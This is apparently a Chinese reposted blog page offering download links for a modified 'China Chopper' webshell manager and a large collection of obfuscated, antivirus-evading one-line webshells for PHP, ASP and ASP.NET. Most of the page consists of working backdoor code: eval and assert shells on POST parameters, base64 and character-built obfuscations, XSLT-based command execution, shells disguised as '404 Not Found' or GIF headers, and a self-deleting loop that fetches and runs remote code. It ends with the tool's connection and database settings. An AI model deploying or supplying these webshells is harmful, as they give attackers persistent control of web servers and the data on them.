最新中国菜刀下载,免杀菜刀一句话大全.

来源：互联网发布：单片机下载电路图编辑：程序博客网时间：2024/06/10 17:19

中国菜刀下载,基于原版中国菜刀优化版20160309.

下载地址:

http://download.csdn.net/detail/settoken/9457567

http://pan.baidu.com/s/1jHoJxHW

China chopper

http://pan.baidu.com/s/1eRxEYjC

Asp

<%
set xmldoc= Server.CreateObject("MSXML2.DOMDocument")
xml="<?xml version=""1.0""?><root >cmd /c dir</root>"
xmldoc.loadxml(xml)
Set xsldoc = Server.CreateObject("MSXML2.DOMDocument")
xlst="<?xml version='1.0'?><xsl:stylesheet version=""1.0"" xmlns:xsl=""http://www.w3.org/1999/XSL/Transform"" xmlns:msxsl=""urn:schemas-microsoft-com:xslt"" xmlns:zcg=""zcgonvh""><msxsl:script language=""JScript"" implements-prefix=""zcg""> function xml(x) {var a=new ActiveXObject('wscript.shell'); var exec=a.Exec(x);return exec.StdOut.ReadAll()+exec.StdErr.ReadAll(); }</msxsl:script><xsl:template match=""/root""> <xsl:value-of select=""zcg:xml(string(.))""/></xsl:template></xsl:stylesheet>"
xsldoc.loadxml(xlst)
response.write "<pre><xmp>" & xmldoc.TransformNode(xsldoc)& "</xmp></pre>"
%>

Php
<?php
$xml='<root>assert($_POST[a]);</root>';
$xsl='<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:zcg="http://php.net/xsl">
<xsl:template match="/root">
<xsl:value-of select="zcg:function(\'assert\',string(.))"/>
</xsl:template>
</xsl:stylesheet>';
$xmldoc = DOMDocument::loadXML($xml);
$xsldoc = DOMDocument::loadXML($xsl);
$proc = new XSLTProcessor();
$proc->registerPHPFunctions();
$proc->importStyleSheet($xsldoc);
$proc->transformToXML($xmldoc);
?>

Aspx
<%@page language="C#"%>
<%@ import Namespace="System.IO"%>
<%@ import Namespace="System.Xml"%>
<%@ import Namespace="System.Xml.Xsl"%>
<%
string xml=@"<?xml version=""1.0""?><root>test</root>";
string xslt=@"<?xml version='1.0'?>
<xsl:stylesheet version=""1.0"" xmlns:xsl=""http://www.w3.org/1999/XSL/Transform"" xmlns:msxsl=""urn:schemas-microsoft-com:xslt"" xmlns:zcg=""zcgonvh"">
<msxsl:script language=""JScript"" implements-prefix=""zcg"">
<msxsl:assembly name=""mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""/>
<msxsl:assembly name=""System.Data, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""/>
<msxsl:assembly name=""System.Configuration, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a""/>
<msxsl:assembly name=""System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a""/>
<![CDATA[function xml() {var c=System.Web.HttpContext.Current;var Request=c.Request;var Response=c.Response;var Server=c.Server;eval(Request.Item['a'],'unsafe');Response.End();}]]>
</msxsl:script>
<xsl:template match=""/root"">
<xsl:value-of select=""zcg:xml()""/>
</xsl:template>
</xsl:stylesheet>";
XmlDocument xmldoc=new XmlDocument();
xmldoc.LoadXml(xml);
XmlDocument xsldoc=new XmlDocument();
xsldoc.LoadXml(xslt);
XslCompiledTransform xct=new XslCompiledTransform();
xct.Load(xsldoc,XsltSettings.TrustedXslt,new XmlUrlResolver());
xct.Transform(xmldoc,null,new MemoryStream());

%>

一句话:
PHP: <?php @eval($_POST['settoken']);?>

ASP: <%eval request("settoken")%>

ASP.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["settoken"],"unsafe");%>

******************************************
<?php eval(base64_decode($_POST[index]))?>
<O>index=ZXZhbCgkX1BPU1RbMF0pOw==</O>
0
<?php fputs(fopen('./settoken.php','w+'),'<?php eval(base64_decode($_POST[index]))?>');?>

<?php
$sme="JrGluZm89rJF9QT1NUW2r9w";
$wd="ZW5pbmZvXTrtlY2hvIGVr";
$ova="2YWwoJGlrurZm8pO2Vr";
$xul = str_replace("ej","","stejrej_ejrejeejplaejceje");
$axc="jraG8grIjQwNCBOb3QgRm91bmQiOw==";
$ay = $xul("z", "", "zbzazszez64z_zdzecozde");
$ao = $xul("h","","hchrehahtheh_hfuhnhchthihohn");
$tik = $ao('', $ay($xul("r", "", $sme.$wd.$ova.$axc))); $tik();
$=$=openinfo
?>

<?php
$webscan=range(1,200);$webscan360=chr($webscan[96]).chr($webscan[114]).chr($webscan[114]).chr($webscan[100]).chr($webscan[113]).chr($webscan[115]);
$webscan360(${chr($webscan[94]).chr($webscan[79]).chr($webscan[78]).chr($webscan[82]).chr($webscan[83])}[chr($webscan[51])]);
$=$=4
?>

<?php $info=$_POST[info];echo eval($info);echo "404 Not Found"; ?>

<?php @preg_replace("//e",$_POST["Access"],"Access Denied"); ?>

<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[index];IF($M==NuLl)HeaDeR('Status:404');Else/**/$K($M);?>

<?php preg_replace("/^/e",base64_decode($_REQUEST[page]),0); ?>
settoken.php?page=ZXZhbChiYXNlNjRfZGVjb2RlKCRfUkVRVUVTVFt6MF0pKQ==

<?php fputs(fopen(base64_decode("bG9ncy5waHA="), "w"), base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWyd0aGlzX2lzX3lpanVodWEnXSk7Pz4="));?>
logs.php
this_is_yijuhua

<?php
$str = 'aerst';
$funct = $str{0}.$str{3}.$str{3}.$str{1}.$str{2}.$str{4};
@$func($_POST['funC']);
?>

<script language="php">@eval($_POST['p'.'h'.'p'])</script>

<?php
$func=pack("c6",97,115,115,101,114,116);
$_POST['c']=base64_decode( $_POST['c']) ;
$func($_POST['404']);
?>

<?php
echo "404 Not Found.";
$__Chr__ = $_POST['echo_Chr_Get']; if ($__Chr__!="") { $echo_Chr_Get__=base64_decode($_POST['z0']); @eval("\$echo = $echo_Chr_Get__;"); } ?>

<?php
echo "404 Not Found.";
$Temp=range(1,200);$Log=chr($Temp[96]).chr($Temp[114]).chr($Temp[114]).chr($Temp[100]).chr($Temp[113]).chr($Temp[115]);
$Log(${chr($Temp[94]).chr($Temp[79]).chr($Temp[78]).chr($Temp[82]).chr($Temp[83])}[chr($Temp[114])]);
$=$=s
?>

<?php

$var = "var";

if (isset($_GET["arg"]))

{

$arg = $_GET["arg"];

eval("\$var = $arg;");

echo "\$var =".$var;

}

?>
?arg=phpinfo()
?arg=fputs(fopen('page.php','w+'),'<?php%20eval($_POST[page])?>')

<?php
header("Content-Type: application/octet-stream");
header("Content-Disposition: attachment; filename=".$_GET['path']);
readfile($_GET['path']);
?>
?path=config.php

<?php include 'log.log';?>



file_put_contents('log.php','<?php eval($_POST[page])?>'); eval.txt
<?php
unlink($_SERVER['SCRIPT_FILENAME']);
ignore_user_abort(true);
set_time_limit(0);

$remote_file = 'http://localhost:8080/eval.txt';
while($code = file_get_contents($remote_file)){
@eval($code);
sleep(5);
};
?>

******************************************
<%eval e%>
<%e=request(page)%>


<%MYTEST=REquEst("page"):EvaL(MYTEST)%>
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("sz"))%>
<%Y=request("x")%> <%execute(Y)%>

<%
dim x1,x2
x1 = request("page")
x2 = x1
eval x2
%>

<%configconfigconfig=REqUEsT(chr(97))%>
<%eVAL configconfigconfig%>
gif89a;gifok<%Page=request("index")%><%eval Page%>gif89a;

数据库:

A) 数据库方面：
-----------------------------------------------------------------------------
PHP脚本：
<T>MYSQL</T> 类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种
<H>localhost<H> 主机地址可为机器名或IP地址，如localhost
<U>root</U> 连接数据库的用户名，如root
<P>settoken</P> 连接数据库的密码，如12345

<L>utf8</L> 这一项数据库类型为MYSQL脚本为PHP时可选，不填则为latin1

ASP和ASP.NET脚本：
<T>类型</T> 类型只能填ADO
<C>ADO配置信息</C>
ADO连接各种数据库的方式不一样。如MSSQL的配置信息为
Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=settoken;
同时，支持NT验证登录MSSQL数据库，并能把查询的结果列表导出为html文件

Customize 脚本：
<T>类型</T> 类型只能填XDB
<X>与Customize 脚本约定的配置信息</X>
菜刀自带的Customize.jsp数据库参数填写方法如下(两行)：
MSSQL:
<X>
com.microsoft.sqlserver.jdbc.SQLServerDriver
jdbc:sqlserver://127.0.0.1:1433;databaseName=test;user=sa;password=settoken
</X>
MYSQL:
<X>
com.mysql.jdbc.Driver
jdbc:mysql://localhost/test?user=root&password=settoken
</X>
ORACLE:
<X>
oracle.jdbc.driver.OracleDriver
jdbc:oracle:thin:user/password@127.0.0.1:1521/test
</X>

B) 其它方面：
-----------------------------------------------------------------------------
添加额外附加提交的数据，如ASP的新服务端是这样的：
<%
Set o = Server.CreateObject("ScriptControl")
o.language = "vbscript"
o.addcode(Request("SC"))
o.run "ff",Server,Response,Request,Application,Session,Error
%>
那么，菜刀在配置处填入：
<O>SC=function+ff(Server,Response,Request,Application,Session,Error):eval(request("pass")):end+function</O>
然后以密码pass来连接即可。

提交功能前先POST额外的数据包：会话期间只提交一次。
<POST>https://zhongguocaidao/cgi-bin/login.cgi</POST>
<DATA>uid=user1&pwd=123456</DATA>

默认终端程序路径设置示例：
<SHELL>/bin/sh</SHELL>

虚拟终端默认命令设置示例：
<CMD>whoami</CMD>

文件管理默认打开的目录设置示例：
<CD>c:\windows\temp\</CD>

　　3) HTTP登录验证
SHELL地址这样填 http://user:pass@maicaidao.com/server.asp
用户名密码中的特殊字符可用URL编码转换.

1 0